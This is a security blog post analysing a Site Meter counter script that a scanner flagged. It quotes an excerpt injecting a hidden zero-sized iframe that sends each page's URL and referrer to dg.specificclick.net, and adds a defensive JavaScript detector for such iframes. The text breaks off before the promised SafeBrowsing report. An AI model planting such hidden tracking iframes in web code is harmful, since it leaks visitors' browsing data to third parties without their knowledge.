What’s up with Sitemeter?
It has been a busy day. Lots of interesting things have happened over the course of the last few hours. One interesting issue we faced came up while trying to help out on badwarebusters.org today. It seems that one of our scans flagged a script hosted by Site Meter as potentially malicious. This gets interesting because this kind of code acts as a tracker to measure how many hits a site gets, where the users are coming from, how much time they spend on a page, etc. The important point is that this code is deployed on tons of websites. Some of the interesting websites I visit also have this code. I was intrigued to see why this popularly used counter was popping up as suspicious.
We had a look at our logs, local dumps and analysis and saw that the Site Meter script was pushing in an iframe pointing to dg.specificclick.net, using a body onload event as the trigger. Interestingly, dg.specificclick.net has been associated with multiple cases of Internet misdemeanor. [0] [1] [2] [3] [4]
It is surprising to see companies that have widely established customer bases linking to questionable content.
The code from the Site Meter script is presented below; the offending part is clearly visible.
// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
init:function( sCodeName, sServerName, sSecurityCode )
** code removed for brevity **
onPageLoad:function()
{
var newIFrame = document.createElement("iframe");
newIFrame.frameBorder = 0;
newIFrame.width = 0;
newIFrame.height = 0;
newIFrame.src = "http://dg.specificclick.net/?u=" + encodeURIComponent(document.location) + "&r=" + encodeURIComponent(SiteMeter.getReferralURL());
** code removed for brevity **
SiteMeter.init('s29rottweilers', 's29.sitemeter.com', '');
var g_sLastCodeName = 's29rottweilers';
// ]]>
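
As an added example (not Site Meter's code and not the scanner used for this post), here is a static check for the pattern visible in the excerpt above: an iframe created from script, sized to zero, with a src on a different site than the one serving the script. The function names, the regex heuristics and the two-label same-site comparison are assumptions made for illustration, and the sample input is constructed from the quoted excerpt.

```javascript
// Added example: static check for script-created hidden iframes.
// Function names and heuristics are illustrative assumptions.
function escapeRe(s) { return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"); }

// Naive same-site test: compares the last two DNS labels (no public-suffix list).
function sameSite(a, b) {
  const tail = (h) => h.toLowerCase().split(".").slice(-2).join(".");
  return tail(a) === tail(b);
}

function findHiddenIframes(source, servingHost) {
  const findings = [];
  // 1. Variables assigned from document.createElement("iframe").
  const createRe = /([A-Za-z_][\w$]*)\s*=\s*document\.createElement\(\s*["']iframe["']\s*\)/gi;
  for (const m of source.matchAll(createRe)) {
    const v = "\\b" + escapeRe(m[1]);
    const has = (pat) => new RegExp(v + pat, "i").test(source);
    // 2. Zero width and height, or display:none, hides the frame from the visitor.
    const zero = "\\s*=\\s*[\"']?0(?:px)?[\"']?\\s*;";
    const hidden =
      (has("\\.(?:style\\.)?width" + zero) && has("\\.(?:style\\.)?height" + zero)) ||
      has("\\.style\\.display\\s*=\\s*[\"']none[\"']");
    // 3. Host taken from the string literal that starts the src assignment.
    const src = new RegExp(v + "\\.src\\s*=\\s*[\"'](?:https?:)?//([^/\"'?#:]+)", "i").exec(source);
    const host = src ? src[1].toLowerCase() : null;
    findings.push({
      variable: m[1],
      host,
      hidden,
      thirdParty: host !== null && !sameSite(host, servingHost),
    });
  }
  return findings;
}

// Constructed sample, modeled on the onPageLoad excerpt quoted in the post.
const SAMPLE = `
var newIFrame = document.createElement("iframe");
newIFrame.frameBorder = 0;
newIFrame.width = 0;
newIFrame.height = 0;
newIFrame.src = "http://dg.specificclick.net/?u=" + encodeURIComponent(document.location);
`;

console.log(findHiddenIframes(SAMPLE, "s29.sitemeter.com"));
```

A finding with both `hidden` and `thirdParty` set is a lead for manual review, not a verdict: string-built or obfuscated URLs will evade a literal-prefix match.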
The SafeBrowsing report from Google about this site follows:


